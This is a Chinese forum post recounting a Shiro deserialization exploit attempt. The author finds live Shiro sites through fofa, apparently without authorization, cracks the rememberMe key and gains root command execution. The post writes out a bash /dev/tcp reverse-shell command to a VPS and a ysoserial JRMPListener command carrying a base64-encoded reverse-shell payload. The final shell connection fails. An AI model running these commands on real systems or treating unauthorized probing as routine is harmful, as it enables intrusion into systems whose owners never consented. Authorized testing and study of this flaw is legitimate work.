一次失败的渗透测试

ajming   ·   发表于 2020-12-17 16:44:19   ·   实战纪实

前言

前段时间在项目上HW,被Apache Shiro反序列化漏洞拿到了root权限,心里一阵难受,等我再去验证复现时候,甲方已经修复了,只能自己去网站上找了。

信息搜集

先掏出我的fofa查找一下,使用Shiro的框架,进行测试


在登录界面进行抓包,存在rememberMe=deleteMe证明是Shiro框架

漏洞验证

使用工具测试一下,是不是存在可破解秘钥


获取到密码进行反编译利用

漏洞利用

记录秘钥,尝试执行命令

神奇!!!可以看到当前用户是root,好激动!!!

反弹shell

于是尝试去反弹shell,由于是公网地址,现在需要准备一个VPS
然后我们来构造payload来进行反弹shell的操作
写好反弹shell的命令
bash -i >& /dev/tcp/*.*.*.*(公网VPS地址)/111 0>&1
然后转换成加密后的指令(http://www.jackson-t.ca/runtime-exec-payloads.html)

将指令合成为一个java的监听指令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1111 CommonsCollections2 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwMS82NjYgMD4mMQ==}|{base64,-d}|{bash,-i}'

运行它开启java一个监听端口


再开启一个终端监听111端口

生成存在payload的cookie

在burp中抓包,添加参数remenberme到cookie中,发送服务器


在nc监听处反弹到shell,但是我失败了,各位大佬有好的建议希望可以联系我!!!

用户名金币积分时间理由
veek 30.00 0 2020-12-18 11:11:37 可以去漏洞复现靶场练手

打赏我,让我更有动力~

0 Reply   |  Until 2020-12-18 | 954 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.